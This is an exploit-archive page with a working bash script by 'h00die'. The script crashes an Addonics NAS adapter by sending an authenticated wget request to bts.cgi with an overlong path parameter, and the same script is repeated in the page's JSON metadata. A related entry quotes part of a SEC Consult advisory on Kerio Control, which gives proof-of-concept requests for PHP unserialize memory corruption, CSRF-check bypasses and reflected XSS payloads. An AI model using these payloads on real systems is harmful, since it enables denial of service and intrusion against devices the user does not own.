Search...

Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)

2009-04-20T00:00:00

ID 1337DAY-ID-6834
Type zdt
Reporter h00die
Modified 2009-04-20T00:00:00

Description

Exploit for hardware platform in category dos / poc

                                        
                                            =============================================================
Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)
=============================================================





#!/bin/bash
######################################################
# Addonics NAS Adapter bts.cgi Post-Auth DoS
# Tested against NASU2FW41 Loader 1.17
# Coded by Mike Cyr, aka h00die
# Notes: Any of these BoF crashes the entire stack from the web GUI
#        so throw a GET, and bye bye baby!
# Greetz to muts and loganWHD, I tried harder
######################################################

echo "Addonics NAS Adapter bts.cgi Post-Auth DoS"
echo "Written by H00die"

echo "------------------------"
echo "Addonics IP:"
read -e IP
echo "Addonics GUI Username:"
read -e USERNAME
echo "Addonics GUI Password:"
read -e PASSWORD

echo "-----------------------"
echo "Select Buffer:"
echo "1. BT Download Path"
echo "2. BT Torrent Path (only works with a drive attached)"

read -e BOF

echo ""
echo "-----------------------"
echo "Sending Malicious GET request"
case "$BOF" in
'1')
wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=&download_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
;;
'2')
wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&download_path=PUBLIC"
;;
esac

echo "Stack Smashed..."



#  0day.today [2018-03-05]  #

JSON Vulners Source

Initial Source

{"hash": "71fb70f740a3ca4d13836e82e060be60f29536f4be565b2e5d534d5a081c6405", "id": "1337DAY-ID-6834", "lastseen": "2018-03-05T21:39:16", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "f64239e1f5667d753ba8ad549134d76b", "key": "description"}, {"hash": "f59bba90eef2240393015c07751d2725", "key": "href"}, {"hash": "199551afad44c8cc9bfb50ba5157d122", "key": "modified"}, {"hash": "199551afad44c8cc9bfb50ba5157d122", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "c7a49fbf12f69a1ecdd00882376904ce", "key": "reporter"}, {"hash": "bf30671e2e9d33c63cac292bc100a793", "key": "sourceData"}, {"hash": "a08c88ef3f5f53ab09e8cf2e6c296d56", "key": "sourceHref"}, {"hash": "adcb4df224a5b0fa499bd5fd9da7f215", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 10.0, "vector": "NONE"}, "vulnersScore": 10.0}, "type": "zdt", "sourceHref": "https://0day.today/exploit/6834", "description": "Exploit for hardware platform in category dos / poc", "title": "Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)", "history": [{"bulletin": {"hash": "0889af2c4a54490114f94eb70aa747a1eb8e89612cf34e367447c8be4cb647d4", "id": "1337DAY-ID-6834", "lastseen": "2016-04-19T23:57:40", "enchantments": {"score": {"value": 3.7, "modified": "2016-04-19T23:57:40"}}, "hashmap": [{"hash": "199551afad44c8cc9bfb50ba5157d122", "key": "modified"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "f64239e1f5667d753ba8ad549134d76b", "key": "description"}, {"hash": "1d6b60dd4a91068d12812fd8b2bf896c", "key": "sourceData"}, {"hash": "199551afad44c8cc9bfb50ba5157d122", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b39af9f30d7d8408b96b35f923a01b4c", "key": "href"}, {"hash": "adcb4df224a5b0fa499bd5fd9da7f215", "key": "title"}, {"hash": "4fbaf1c40fa2839d886ced3afb13ed8d", "key": "sourceHref"}, {"hash": "c7a49fbf12f69a1ecdd00882376904ce", "key": "reporter"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/6834", "description": "Exploit for hardware platform in category dos / poc", "viewCount": 0, "title": "Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "=============================================================\r\nAddonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)\r\n=============================================================\r\n\r\n\r\n\r\n\r\n\r\n#!/bin/bash\r\n######################################################\r\n# Addonics NAS Adapter bts.cgi Post-Auth DoS\r\n# Tested against NASU2FW41 Loader 1.17\r\n# Coded by Mike Cyr, aka h00die\r\n# Notes: Any of these BoF crashes the entire stack from the web GUI\r\n# so throw a GET, and bye bye baby!\r\n# Greetz to muts and loganWHD, I tried harder\r\n######################################################\r\n\r\necho \"Addonics NAS Adapter bts.cgi Post-Auth DoS\"\r\necho \"Written by H00die\"\r\n\r\necho \"------------------------\"\r\necho \"Addonics IP:\"\r\nread -e IP\r\necho \"Addonics GUI Username:\"\r\nread -e USERNAME\r\necho \"Addonics GUI Password:\"\r\nread -e PASSWORD\r\n\r\necho \"-----------------------\"\r\necho \"Select Buffer:\"\r\necho \"1. BT Download Path\"\r\necho \"2. BT Torrent Path (only works with a drive attached)\"\r\n\r\nread -e BOF\r\n\r\necho \"\"\r\necho \"-----------------------\"\r\necho \"Sending Malicious GET request\"\r\ncase \"$BOF\" in\r\n'1')\r\nwget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD \"http://$IP/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=&download_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\"\r\n;;\r\n'2')\r\nwget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD \"http://$IP/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&download_path=PUBLIC\"\r\n;;\r\nesac\r\n\r\necho \"Stack Smashed...\"\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2009-04-20T00:00:00", "references": [], "reporter": "h00die", "modified": "2009-04-20T00:00:00", "href": "http://0day.today/exploit/description/6834"}, "lastseen": "2016-04-19T23:57:40", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "=============================================================\r\nAddonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)\r\n=============================================================\r\n\r\n\r\n\r\n\r\n\r\n#!/bin/bash\r\n######################################################\r\n# Addonics NAS Adapter bts.cgi Post-Auth DoS\r\n# Tested against NASU2FW41 Loader 1.17\r\n# Coded by Mike Cyr, aka h00die\r\n# Notes: Any of these BoF crashes the entire stack from the web GUI\r\n# so throw a GET, and bye bye baby!\r\n# Greetz to muts and loganWHD, I tried harder\r\n######################################################\r\n\r\necho \"Addonics NAS Adapter bts.cgi Post-Auth DoS\"\r\necho \"Written by H00die\"\r\n\r\necho \"------------------------\"\r\necho \"Addonics IP:\"\r\nread -e IP\r\necho \"Addonics GUI Username:\"\r\nread -e USERNAME\r\necho \"Addonics GUI Password:\"\r\nread -e PASSWORD\r\n\r\necho \"-----------------------\"\r\necho \"Select Buffer:\"\r\necho \"1. BT Download Path\"\r\necho \"2. BT Torrent Path (only works with a drive attached)\"\r\n\r\nread -e BOF\r\n\r\necho \"\"\r\necho \"-----------------------\"\r\necho \"Sending Malicious GET request\"\r\ncase \"$BOF\" in\r\n'1')\r\nwget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD \"http://$IP/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=&download_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\"\r\n;;\r\n'2')\r\nwget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD \"http://$IP/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&download_path=PUBLIC\"\r\n;;\r\nesac\r\n\r\necho \"Stack Smashed...\"\r\n\r\n\r\n\n# 0day.today [2018-03-05] #", "published": "2009-04-20T00:00:00", "references": [], "reporter": "h00die", "modified": "2009-04-20T00:00:00", "href": "https://0day.today/exploit/description/6834"}

{"zdt": [{"lastseen": "2018-03-06T03:38:30", "references": [], "edition": 2, "description": "Exploit for php platform in category web applications", "reporter": "SEC Consult", "published": "2016-09-22T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "type": "zdt", "title": "Kerio Control Unified Threat Management 9.1.0 build 1087 / 9.1.1 build 1324 - Multiple Vulnerabiliti", "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-09-22T00:00:00", "id": "1337DAY-ID-24808", "href": "https://0day.today/exploit/description/24808", "sourceData": "Video:\r\nhttps://www.youtube.com/watch?v=y_OWz25sHMI\r\n \r\n \r\nSEC Consult Vulnerability Lab Security Advisory < 20160922-0 >\r\n=======================================================================\r\n title: Potential backdoor access through multiple vulnerabilities\r\n product: Kerio Control Unified Threat Management\r\n vulnerable version: <9.1.3, verified in version 9.1.0 build 1087 and 9.1.1\r\n build 1324\r\n fixed version: 9.1.3 (partially fixed, see vendor statement below)\r\n CVE number: -\r\n impact: critical\r\n homepage: http://www.kerio.com/\r\n found: 2016-08-24\r\n by: R. Freingruber (Office Vienna)\r\n R. Tavakoli (Office Vienna)\r\n SEC Consult Vulnerability Lab\r\n \r\n An integrated part of SEC Consult\r\n Bangkok - Berlin - Linz - Montreal - Moscow\r\n Singapore - Vienna (HQ) - Vilnius - Zurich\r\n \r\n https://www.sec-consult.com\r\n \r\n=======================================================================\r\n \r\nVendor description:\r\n-------------------\r\n\"Protect your network from viruses, malware and malicious activity\r\nwith Kerio Control, the easy-to-administer yet powerful all-in-one\r\nsecurity solution.\r\nKerio Control brings together next-generation firewall capabilities -\r\nincluding a network firewall and router, intrusion detection and\r\nprevention (IPS), gateway anti-virus, VPN, and web contentand\r\napplication filtering. These comprehensive capabilities and unmatched\r\ndeployment flexibility make Kerio Control the ideal choice for small\r\nand mid-sized businesses.\"\r\n \r\nSource: http://www.kerio.com/products/kerio-control\r\n \r\n \r\nBusiness recommendation:\r\n------------------------\r\nBy combining the vulnerabilities documented in this advisory an attacker\r\ncan fully compromise a network which uses the Kerio Control appliance for\r\nprotection.\r\n \r\nThe attacker can trick a victim to visit a malicious website which then conducts\r\nthe internal attack. The attacked victim must be logged in or weak credentials\r\nmust be configured which can be found with a bruteforce attack.\r\n \r\nThe attacker will gain a reverse root shell from the Internet to the internal\r\nKerio Control firewall system. Moreover, it's possible that an internal attacker\r\nuses the described vulnerabilities to escalate his privileges (low privileged\r\naccount to full root shell) to steal credentials from other users on the UTM\r\nappliance.\r\n \r\nMost vulnerabilities (RCE, CSRF bypasses, XSS, Heap Spraying) were found\r\nin just two PHP scripts. Both scripts are not referenced by any other\r\nPHP script nor by any binary on the system.\r\nBoth scripts contain a different(!), seemingly deliberate(?) CSRF bypass\r\nwhich make the vulnerabilities exploitable from the Internet to obtain a\r\nreverse root shell.\r\n \r\nSEC Consult recommends not to use Kerio Control until a thorough security\r\nreview has been performed by security professionals and all identified\r\nissues have been resolved.\r\n \r\n \r\nVulnerability overview/description:\r\n-----------------------------------\r\n1) Unsafe usage of the PHP unserialize function and outdated PHP version leads\r\n to remote-code-execution\r\nAn authenticated user (standard user or administrator) can control data, which\r\ngets later unserialized. Kerio Control uses PHP 5.2.13 which was released on\r\n2010-02-25. This version is more than 6 years old and several bugs were found\r\nin the meantime within the unserialize function. The following CVE numbers\r\nare just some examples for vulnerabilities in unserialize which lead to remote\r\ncode execution:\r\n -) CVE-2014-8142\r\n -) CVE-2014-3515\r\n -) CVE-2015-0231\r\n -) CVE-2015-6834\r\n -) CVE-2016-5771\r\n -) CVE-2016-5773\r\n \r\nPHP 5.2.13 is especially affected by CVE-2014-3515. This vulnerability uses a\r\ntype confusion attack to trigger a use-after-free vulnerability. It can be used\r\nto read data and get full code execution. In the case of Kerio Control the\r\nresult of unserialize is not reflected back to the attacker. It's therefore not\r\npossible to read memory from the stack or heap (e.g. to bypass ASLR).\r\n \r\nNevertheless, SEC Consult developed a fully working and reliable (blind) exploit\r\nfor this vulnerability which spawns a reverse root shell to the Kerio Control\r\nsystem.\r\nFor this exploit a user account is required. However, it's also possible to\r\nconduct the attack via the Internet because the CSRF (Cross Site Request\r\nForgery) check can be bypassed (see below).\r\n \r\nAn attacker can use this vulnerability to break into a company network via the\r\nInternet by tricking a logged in user to visit a malicious website. Even if the\r\nuser is currently not logged in the attacker can start a bruteforce attack to\r\nobtain valid credentials to conduct the attack.\r\n \r\n \r\n2) PHP script allows heap spraying\r\nOne of the PHP scripts allows the allocation of memory inside the main binary\r\n(winroute) of Kerio Control. Winroute contains the code of most services\r\n(e.g. the webserver, PHP, network related functionality, ...).\r\nThe memory will not be freed after finishing the request and can therefore be\r\nused to spray payloads to the whole memory space.\r\n \r\nThis vulnerability was used in the overall exploit to defeat ASLR.\r\nPlease bear in mind that it's very likely that an attacker can write a working\r\nexploit without heap spraying. Fixing this vulnerability would therefore not\r\nprevent the exploitation of the remote code execution vulnerability.\r\nFor example, the information disclosure vulnerability from this advisory can\r\nbe used to bypass ASLR as well. This would eliminate the need of heap spraying.\r\n \r\n \r\n3) CSRF Protection Bypass\r\nThe PHP scripts contain code to protect against CSRF (Cross Site Request\r\nForgery) attacks. Because of the wrong usage of PHP binary\r\noperations and comparisons it's possible to bypass this check. That means\r\nthat an attacker can trigger requests from other websites which will be handled\r\nby Kerio Control. This vulnerability allows to exploit the remote code\r\nexecution vulnerability from the Internet to break into a network.\r\n \r\n \r\n4) Webserver running with root privileges\r\nThe main binary (which contains the webserver and PHP) runs with root\r\nprivileges.\r\n \r\nKerio told SEC Consult that this vulnerability will not be fixed. SEC\r\nConsult strongly recommended otherwise.\r\n \r\n \r\n5) Reflected Cross Site Scripting (XSS)\r\nKerio Control does not properly encode parameters which are reflected on the\r\nwebsite. This leads to cross site scripting vulnerabilities.\r\nAn attacker can abuse these vulnerabilities to modify the website or do actions\r\nin the context of the attacked user.\r\n \r\n \r\n6) Missing memory corruption protections\r\nThe main binary (winroute) is not compiled as position-independent executable\r\n(PIE). This allowed the use of ROP (return-oriented-programming) code to\r\nbypass the not executable heap. Moreover, the stack is per default marked as\r\nexecutable, but the exact location of the stack is randomized by ASLR.\r\n \r\n \r\n7) Information Disclosure leads to ASLR bypass\r\nOne of the PHP scripts leaks pointers to the stack and heap.\r\nThis can be abused by attackers to bypass ASLR.\r\nBecause stacks are marked as executable an attacker can therefore easily bypass\r\nASLR and DEP/NX.\r\n \r\n \r\n8) Remote Code Execution as administrator\r\nNearly a year ago on 2015-10-12 Raschin Tavakoli reported a remote code\r\nexecution vulnerability in the administrative web interface in the upgrade\r\nfunctionality. This vulnerability is still unfixed, only the associated XSS\r\nvulnerability was fixed. However, an attacker can still exploit it from the\r\nInternet, e.g. by abusing the XSS vulnerability described in this advisory\r\n(where the CSRF check can be bypassed).\r\n \r\nWith this vulnerability an attacker can gain a reverse root shell on\r\nKerio Control again if a logged in administrator visits a malicious website\r\non the Internet.\r\nMore information can also be found in the old advisory:\r\nhttps://www.exploit-db.com/exploits/38450/\r\n \r\n \r\n9) Login not protected against brute-force attacks\r\nThere are no bruteforce protections in place for the login.\r\nIf an unauthenticated victim visits an attacker's website, the attacker can\r\nstart a bruteforce attack to obtain valid credentials to execute the\r\nremote code execution exploit. Via image-loading the attacker can detect if\r\nthe current credentials are valid (without violating SOP).\r\n \r\n \r\nProof of concept:\r\n-----------------\r\n1) Unsafe usage of the PHP unserialize function and outdated PHP version leads\r\n to remote-code-execution\r\nThe following request can be used to set the unserialize data. In this example\r\na faked string is used which points to 0xffffffff (kernel memory). Unserializing\r\nit will therefore crash the remote webserver (the winroute process).\r\n \r\nPOST /set.php HTTP/1.1\r\nHost: $IP:4081\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nCookie: SESSION_CONTROL_WEBIFACE=<valid session ID>;\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 730\r\n \r\nk_securityHash=x&target=k_sessionVariable&k_variable=lastDisplayed&k_value=a:18:{s:8:\"k_dbName\";s:5:\"error\";s:11:\"k_dbSummara\";s:3:\"abc\";s:14:\"k_dbIndividual\";s:3:\"abc\";s:16:\"k_dbLastUsedType\";s:3:\"abc\";s:10:\"k_dbLayout\";s:3:\"abc\";s:10:\"k_pageType\";s:3:\"abc\";s:13:\"k_periodStart\";i:123;s:11:\"k_periodEnd\";i:123;s:8:\"k_userId\";i:123;s:6:\"tabBar\";i:123;s:13:\"k_gotoElement\";i:123;s:9:\"k_protoId\";i:123;s:11:\"k_errorType\";i:123;s:16:\"k_timezoneOffset\";i:123;s:9:\"k_groupId\";i:123;s:2:\"id\";i:123;s:11:\"k_dbSummary\";C:16:\"SplObjectStorage\":152:{x:i:2;O:8:\"stdClass\":1:{i:0;a:2:{i:1;i:1;i:2;i:2;}};d:2.0851592721051977e-262;;m:a:2:{i:0;S:15:\"\\ff\\ff\\ff\\ff\\20\\00\\00\\00\\01\\00\\00\\00\\06\\00\\00\";i:1;R:3;}}s:18:\"k_historyTimestamp\";s:3:\"abc\";}\r\n \r\nThe following request will call unserialize on the injected data:\r\n \r\nGET /contentLoader.php?k_getHistoryId=1&k_securityHash=x HTTP/1.1\r\nHost: $IP:4081\r\nCookie: SESSION_CONTROL_WEBIFACE=<valid session ID>;\r\nConnection: close\r\n \r\nIn the example above only a denial of service will be conducted. However, an\r\nattacker can change the data type to object to get full code execution on\r\nthe remote system.\r\n \r\nSEC Consult developed a fully working exploit for this attack which spawns a\r\nroot shell. Please note that this exploit was intentionally written to just\r\ntarget Kerio Control 9.1.0 Build 1087. This is because hardcoded offsets\r\nare used which belong to the winroute binary with the SHA256 hash:\r\n2808c35528b9a4713b91f65a881dfca03088de08b6331fdee1c698523bd757b0\r\nThis exploit will not be released for now.\r\n \r\nA real-world-attacker can detect the remote binary version by bruteforcing\r\nthe object handler related to CVE-2014-3515.\r\n \r\n \r\n2) PHP script allows heap spraying\r\nThe set.php script contains the following code:\r\n$p_variable = urldecode($_POST['k_variable']);\r\n$p_value = urldecode($_POST['k_value']);\r\n...\r\n$p_session->setSessionVariable($p_variable, $p_value);\r\n \r\nPOST requests with the following parameters can therefore be used to allocate\r\nspace on the remote system:\r\nk_securityHash=x&target=k_sessionVariable&k_variable=<random_name>\r\n&k_value=<payload_to_allocate>\r\n \r\nDuring tests it was possible to spray approximately 400 MB data in 30 seconds\r\nwhich is enough to control two predictable addresses on the heap.\r\n \r\n \r\n3) CSRF Protection Bypass\r\nTwo scripts are required for the remote code execution exploit:\r\n -) set.php\r\n -) ContentLoader.php\r\nBoth scripts contain different very interesting CSRF check bypasses.\r\n \r\nThe following code can be found in set.php:\r\n$p_session->getCsrfToken(&$p_securityHash);\r\n$p_postedHash = $_GET['k_securityHash'] || $_POST['k_securityHash'];\r\nif ('' == $p_postedHash || ($p_postedHash != $p_securityHash)) {\r\nexit();\r\n}\r\n \r\nSince the programming language is PHP (and not JavaScript), the above code code\r\ndoes not work as expected. $p_postedHash can only become 0 or 1 because || is a\r\nlogical operator. The if-condition compares the valid token with the posted one\r\nvia the != operator, however, this will not check if types are the same.\r\nIf k_securityHash is set (either via GET or POST) to any value, the above code\r\nwill compare the number 1 with a string, which will always bypass the check.\r\nIt's therefore enough to set k_securityHash to any value to bypass the CSRF\r\nprotection.\r\n \r\nThe following code can be found in contentLoader.php:\r\n$p_session->getCsrfToken(&$p_securityHash);\r\n$p_postedHash = $_GET['k_securityHash'];\r\n...\r\nif (!$p_session || ('' == $p_postedHash && $p_postedHash != $p_securityHash)) {\r\n$p_page = new p_Page();\r\n$p_page->p_jsCode('window.top.location = \"index.php\";');\r\n$p_page->p_showPageCode();\r\ndie();\r\n}\r\n \r\nNow the programmers only use the GET parameter, however, they changed the\r\nlogical operator in the if condition from || to && which means that the CSRF\r\ncheck will only be applied if $p_postedHash is empty. It's therefore again\r\nenough to set k_securityHash to any value to bypass the check.\r\n \r\n \r\n4) Webserver running with root privileges\r\nNo proof of concept necessary.\r\n \r\n \r\n5) Reflected Cross Site Scripting (XSS)\r\nIn the following request the k_historyTimestamp parameter is prone to XSS:\r\nhttps://<IP>:4081/contentLoader.php?k_dbName=x&k_securityHash=x\r\n&k_historyTimestamp=aa%22;alert(1)%3b//\r\n \r\nIn the same request the id parameter can be used to inject JavaScript code.\r\nNote that the attack can only be conducted against administrative users.\r\nUsers with standard privileges can only access pages with k_dbName set to one\r\nof the following values:\r\n -) accStats\r\n -) prefs\r\n -) dialup\r\n -) error\r\n \r\nIn such a case Kerio Control adds code like the following\r\n(in this example k_dbName=dialup):\r\nvar k_newDbName = \"<kerio:text id=\"tabCaption_dialup\"/>\";\r\n \r\nThe \" characters within the string are not correctly encoded.\r\nThis will lead to the termination of the JavaScript execution. Because the\r\ninjected payload is stored after this code, the attacker must bypass this\r\ncode to ensure that the payload gets executed. This is only possible if\r\nthe attacked user is an administrator because administrators can load any\r\ndbName. By setting k_dbName to an invalid dbName (e.g. to 'x'), code like\r\nthe following will be added instead (which does not crash):\r\nvar k_newDbName = \"\";\r\n \r\nAnother XSS can be found at:\r\nhttps://<IP>:4081/admin/internal/dologin.php?hash=%0D%0A\"><script>alert(1);</script><!--\r\n \r\n \r\n6) Missing memory corruption protections\r\nNo proof of concept necessary.\r\n \r\n \r\n7) Information Disclosure leads to ASLR bypass\r\nThe following request returns information to the currently logged in user\r\n(e.g. session token and username):\r\n \r\nGET /nonauth/getLoginType.js.php HTTP/1.1\r\nHost: $IP:4081\r\nCookie: SESSION_CONTROL_WEBIFACE=<valid session ID>;\r\nConnection: close\r\n \r\nThe following is a typical response:\r\n \r\nHTTP/1.1 200 OK\r\nConnection: Close\r\nContent-type: text/html\r\nDate: Tue, 24 Aug 2016 11:47:34 GMT\r\nServer: Kerio Control Embedded Web Server\r\nX-UA-Compatible: IE=edge\r\n \r\nk_loginParams.k_loginType = \"loginUnlock\";k_loginParams.k_nonauthToken =\r\n\"0xb59066a8\";k_loginParams.k_sessionToken =\r\n\"bc7c9ae78f01e498b7c935b4ad521b664d4e2c5574bde30cdf57851a58763660\";k_loginParams.k_loggedUser\r\n= {k_asocName: \"user\", k_fullName: \"user\"};\r\n \r\nThe above response contains a valid pointer (0xb59066a8). In most cases this\r\npointer will point to the heap. However, sometimes this pointer will point\r\ninto a readable and writeable region behind a stack-region.\r\nThe target location always stores the same data. During the analysis no\r\nfurther effort was spent on analysing this behaviour.\r\n \r\nThe pointer will also be disclosed if the user is already logged out.\r\nIn such a case the response looks like:\r\n \r\nHTTP/1.1 200 OK\r\nConnection: Close\r\nContent-type: text/html\r\nDate: Tue, 24 Aug 2016 12:04:44 GMT\r\nServer: Kerio Control Embedded Web Server\r\nX-UA-Compatible: IE=edge\r\n \r\nk_loginParams.k_loginType = \"loginCommon\";k_loginParams.k_nonauthToken =\r\n\"0xb2ee208\";\r\n \r\n \r\nAn attack scenario can be:\r\n -) The attacker tricks a victim to visit the attacker's malicious website\r\n -) The attacker's website 